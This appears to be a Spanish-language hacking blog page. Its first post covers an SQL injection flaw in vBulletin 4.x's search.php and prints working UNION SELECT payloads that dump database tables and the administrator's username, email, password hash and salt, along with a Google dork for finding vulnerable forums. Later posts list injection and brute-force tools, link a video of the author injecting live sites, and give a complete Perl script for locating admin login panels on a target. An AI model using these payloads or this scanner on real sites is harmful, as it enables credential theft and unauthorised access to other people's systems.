vBulletin vulnerable a inyección SQL en search.php
Mirando las ultimas inyecciones sql que se han descubierto me tope con esta en el blog de «hackplayers»
vBulletin es un famoso software de foros basado en PHP y MySQL. El mes pasado se reportó una seria inyección SQL que afectaba a sus versiones 4.0.x, 4.1.0, 4.1.1 y 4.1.2 y recientemente esa vulnerabilidad se está empezando a utilizar para atacar e infectar a múltiples foros.
El código vulnerable se encuentra en:
/vb/search/searchtools.php – línea 715;
/packages/vbforum/search/type/socialgroup.php – línea 201:203;
Y podemos inyectar las sentencia SQL a través de la búsqueda (search.php), concretamente en la petición POST de «Búsqueda con múltiples tipos de contenido» marcando «Grupos»:
Ej:
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0×3a,email,0×3a,password,0×3a,salt)
FROM user WHERE userid=1#
Actualmente existen multitud de sitios vulnerables (Dork : inurl:»search.php?search_type=1″) por lo que ¡se recomienda actualizar lo antes posible a la versión 4.1.3!
versiones vulnerables:
vBulletin Publishing suite
- 4.1.2
- 4.1.1
- 4.1.0 PL2
- 4.0.8 PL2
- 4.0.7
- 4.0.6
- 4.0.5
- 4.0.4 PL1
- 4.0.3 PL1
- 4.0.2 PL4
- 4.0.1
- 4.0.0 PL1
vBulletin Forum classic
- 4.1.2
- 4.1.1
- 4.1.0 PL2
- 4.0.8 PL2
- 4.0.7
- 4.0.6 PL1
- 4.0.5
- 4.0.4 PL1
- 4.0.3 PL1
- 4.0.2 PL4
- 4.0.1
- 4.0.0 PL1
Referencias:
Sucuri Research Blog
Information Security News and Exploits
J0hn.X3r
Como hacer una inyeccion sql desde 0
Con este texto me inicie en las inyecciones sql espero a ustedes les sirva como me sirvio ami:
Documentacion y Herramientas Automaticas para SQL Injection
SQLMap – Herramienta Automática de Inyección SQL
sqlmap es una herramienta desarrollada en python para realizar inyección de código sql automáticamente. Su objetivo es detectar y aprovechar las vulnerabilidades de inyección SQL en aplicaciones web. Una vez que se detecta una o más inyecciones SQL en el host de destino…
http://www.dragonjar.org/sqlmap-herr…cion-sql.xhtml
BSQL Hacker – Completo Framework para SQL Injection
BSQL Hacker es un completo Framework para realizar un testeo de SQL Injection en nuestro aplicativos web, permite automatizar los procesos de búsqueda de inyecciones SQL (SQL Injection) e inyecciones ciegas de SQL (Blind SQL Injection) esta licenciada bajo GPL v2…
http://www.dragonjar.org/bsql-hacker…njection.xhtml
MSSQL-hax0r v0.9 – Script Multi Propositos para MS-SQL Injection
mssql-hax0r v0.9 es una herramienta multiusos para realizar ataques inyección y explotación avanzada del servidor de Microsoft SQL. Dispone de tes modos de operación actualmente….
http://www.dragonjar.org/mssql-hax0r…njection.xhtml
Pipper – Herramienta para la auditorías de aplicaciones web
Pipper es una herramienta Automatizar peticiones en aplicativos Web y su función principalmente es ayudar en las auditorías de aplicaciones web…
http://www.dragonjar.org/pipper-herr…ones-web.xhtml
Bruter – Herramienta Para Crackear Password por Fuerza Bruta de Forma Paralela en Windows
Se ha puesto en libertad el Bruter 1,0 BETA1. Bruter es una Herramienta Para Crackear Password por Fuerza Bruta de Forma Paralela en Windows…
http://www.dragonjar.org/bruter-herr…-windows.xhtml
Sandcat, Escaneador de Servidores y Aplicaciones Web
Sandcat es un escaneador de vulnerabilidades que permite a los los administradores web realizar un escaneo agresivo y comprensivo de una organización para aislar vulnerabilidades e identificar los agujeros de la seguridad…
http://www.dragonjar.org/sandcat-esc…ones-web.xhtml
GreenSQL, Firewall de código abierto para Bases de Datos
GreenSQL es un cortafuegos diseñado para brindar protección a Bases de Datos, especificamente MySQL frente a ataques del tipo SQL injection. GreenSQL trabaja en modo proxy interviniendo las conexiones a la base de datos y evaluando los comandos SQL que se envían….
http://www.dragonjar.org/greensql-fi…de-datos.xhtml
Lista de Scanners para SQL Injection.
Viendo un articulo en Security Hacks donde analizan 15 herramientas escaneo para lograr SQL Injection, me encuentro con este listado de aplicaciones para realizar esta tarea…
http://www.dragonjar.org/lista-de-sc…njection.xhtml
DOCUMENTACION:
Video: Blind SQL Injection Técnicas Avanzadas
A continuación les dejo el vídeo de una conferencia sobre Técnicas Avanzadas de Blind SQL Injection dictada por Daniel Kachakil de Electronic Dreams y Pedro Laguna de Informática64 el 7 de Octubre de 2007 en Getafe España….
http://www.dragonjar.org/video-blind…vanzadas.xhtml
Como protegerse contra las técnicas de Blind SQL Injection
Maligno webmaster de “Un informático en el lado del mal” ha terminado su serie de artículos titulados “Protección contra las técnicas de Blind SQL Injection”, son de lectura recomendada…
http://www.dragonjar.org/como-proteg…njection.xhtml
Manual de SQL (Structured Query Language)
Excelente Manual del Lenguaje SQL. Esta en formato PDF. Se tocan muchos conceptos sobre este lenguaje y se habla muy a fondo…
http://www.dragonjar.org/manual-de-s…language.xhtml
SQL Injection Cheat Sheet
EL siguiente Cheat Sheet (nosotros los paisas los llamamos pasteles, aunque en la mayoria de paises sean conocidos como chuletas) pretende hacer de manera clara y muy especifica las sentencias mas utilizadas en ataques de SQL Injection…
http://www.dragonjar.org/sql-injecti…at-sheet.xhtml
POR: DragoN
Como hacer una inyeccion SQL
Bueno como he visto que ultimamente las inyecciones sql estan de moda he decidido hacer un manual y un video muy explicativo en el que muestro como le hago una inyeccion sql a dos paginas distintas, bueno y sin mas preambulos….
Para una mejor calidad y vision del video lo pueden ver desde aqui http://www.youtube.com/watch?v=kJB8zthvh_w ponerlo en definicion HD y verlo en pantalla completa o si lo desean aqui les pongo el video pero es mejor lo que les acabe de decir
XPF encuentra paneles de administracion
Buscando por la red encontré un blog en el cual habia una herramienta para encontrar paneles de administracion de una pagina web cualquiera, me parecio interesante ya que la probe con una pagina web que tenia hace meses y el programa me encontro un panel de administracion por el cual tuve acceso a la web
el programa esta echo en perl, por lo que me llamo mas la atencion ya que se puede usar en linux,
aqui les dejo el code:
———————————————————————————————————————————————————————————–
#!/usr/bin/perl
use LWP::UserAgent;
if (!$ARGV[0]) {
print q (
xassiz PathFinder
db db d8888b. d88888b
`8b d8′ 88 `8D 88′
`8bd8′ 88oodD’ 88ooo Modificado Por F1D3N715 >> Añadido mas paneles de administracion
.dPYb. 88~~~ 88~~~
.8P Y8. 88 88
YP YP 88 YP
[+] Modo de uso:
perl XPF.pl http://www.target.com
——————————-
Coded by xassiz
);
exit 1;
}
print q (
db db d8888b. d88888b
`8b d8′ 88 `8D 88′
`8bd8′ 88oodD’ 88ooo
.dPYb. 88~~~ 88~~~ Modificado Por F1D3N715 >> Añadido mas paneles de administracion
.8P Y8. 88 88
YP YP 88 YP
);
$target = $ARGV[0];
print(«n [?] Analizando: $target n»);
@paneles=(‘admin/’,’ADMIN/’,’paneldecontrol/’,’login/’,’adm/’,’cms/’,
‘admon/’,’ADMON/’,’administrador/’,’administrator/’,’admin/login.php’,
‘ADMIN/login.php’,’admin/home.php’,’admin/controlpanel.html’,’admin/controlpanel.php’,’admin.php’,
‘admin.html’,’admin/cp.php’,’admin/cp.html’,’cp.php’,’cp.html’,’controlpanel/’,’panelc/’,
‘administrator/index.php’,’administrator/login.html’,’administrator/login.php’,’administrator/account.html’,
‘administrator/account.php’,’administrator.php’,’administrator.html’,’login.php’,’login.html’,
‘modelsearch/login.php’,’moderator.php’,’moderator.html’,’moderator/login.php’,’moderator/login.html’,
‘moderator/admin.php’,’moderator/admin.html’,’moderator/’,’account.php’,’account.html’,’controlpanel/’,
‘admin/index.asp’,’admin/login.asp’,’admin/home.asp’,’admin/controlpanel.asp’,’admin.asp’,’admin/cp.asp’,
‘cp.asp’,’administrator/index.asp’,’administrator/login.asp’,’administrator/account.asp’,’administrator.asp’,
‘login.asp’,’modelsearch/login.asp’,’moderator.asp’,’moderator/login.asp’,’moderator/admin.asp’,’account.asp’,
‘controlpanel.asp’,’admincontrol.asp’,’adminpanel.asp’,’fileadmin/’,’fileadmin.php’,’fileadmin.asp’,
‘fileadmin.html’,’administration/’,’administration.php’,’administration.html’,’sysadmin.php’,’sysadmin.html’,
‘phpmyadmin/’,’myadmin/’,’sysadmin.asp’,’sysadmin/’,’ur-admin.asp’,’ur-admin.php’,’ur-admin.html’,’ur-admin/’,
‘Server.php’,’Server.html’,’Server.asp’,’Server/’,’wp-admin/’,’administr8.php’,’administr8.html’,
‘administr8/’,’administr8.asp’,’webadmin/’,’webadmin.php’,’webadmin.asp’,’webadmin.html’,’administratie/’,
‘admins/’,’admins.php’,’admins.asp’,’admins.html’,’administrivia/’,’Database_Administration/’,’WebAdmin/’,
‘sysadmins/’,’admin1/’,’system-administration/’,’administrators/’,’pgadmin/’,’directadmin/’,
‘staradmin/’,’ServerAdministrator/’,’SysAdmin/’,’administer/’,’sys-admin/’,’typo3/’,
‘panel/’,’cpanel/’,’cPanel/’,’cpanel_file/’,’platz_login/’,’rcLogin/’,’blogindex/’,
‘formslogin/’,’autologin/’,’support_login/’,’meta_login/’,’manuallogin/’,’simpleLogin/’,
‘loginflat/’,’utility_login/’,’showlogin/’,’memlogin/’,’members/’,’login-redirect/’,’sub-login/’,
‘wp-login/’,’login1/’,’dir-login/’,’login_db/’,’xlogin/’,’smblogin/’,’customer_login/’,
‘login-us/’,’acct_login/’,’admin_area/’,’bigadmin/’,’project-admins/’,’phppgadmin/’,’pureadmin/’,
‘sql-admin/’,’radmind/’,’openvpnadmin/’,’wizmysqladmin/’,’vadmind/’,’ezsqliteadmin/’,
‘hpwebjetadmin/’,’newsadmin/’,’adminpro/’,’Lotus_Domino_Admin/’,’bbadmin/’,’vmailadmin/’,
‘Indy_admin/’,’ccp14admin/’,’irc-macadmin/’,’banneradmin/’,’sshadmin/’,’phpldapadmin/’,’macadmin/’,
‘administratoraccounts/’,’admin4_account/’,’admin4_colon/’,’radmind-1/’,’Super-Admin/’,’AdminTools/’,
‘cmsadmin/’,’SysAdmin2/’,’globes_admin/’,’cadmins/’,’phpSQLiteAdmin/’,’navSiteAdmin/’,’server_admin_small/’,
‘logo_sysadmin/’,’server/’,’database_administration/’,’ADMIN/login.html’,’system_administration/’,’ss_vms_admin_sm/’);
foreach $finder( @paneles) {
$buscador = LWP::UserAgent->new() or die;
$busqueda = $buscador->get($target.»/».$finder);
if ($busqueda->content =~ /username/ || $busqueda->content =~ /Username/ || $busqueda->content =~ /UserName/ ||
$busqueda->content =~ /usuario/ || $busqueda->content =~ /Usuario/ ||
$busqueda->content =~ /user/ || $busqueda->content =~ /User/ ||
$busqueda->content =~ /password/ || $busqueda->content =~ /Password/ ||
$busqueda->content =~ /contraseña/ || $busqueda->content =~ /Contraseña/ ||
$busqueda->content =~ /senha/ || $busqueda->content =~ /Senha/ ||
$busqueda->content =~ /pass/ || $busqueda->content =~ /Pass/ ||
$busqueda->content =~ /pwd/ || $busqueda->content =~ /Pwd/
) {
print(«n [+] Encontrado: $target/$finder na»);
}
}
exit 1;
———————————————————————————————————————————————————————————–
Como usar en linux
crean un documento vacio y copian el code al documento y le ponen de nombre finder.pl o cualquier nombre.pl y guardan todo y lo cierran, despues abren la shell y ubican el archivo, yo lo guarde en el escritorio para acceder mas facil a el, en mi caso, escribo: cd Escritorio
cuando lo ubiquen ejecutan el comando: perl finder.pl y sigan las instrucciones que les muestre en pantalla
———————————————————————————————————————————————————————————–
En windows,
hacen lo mismo que en linux pero deben tener instalado activeperl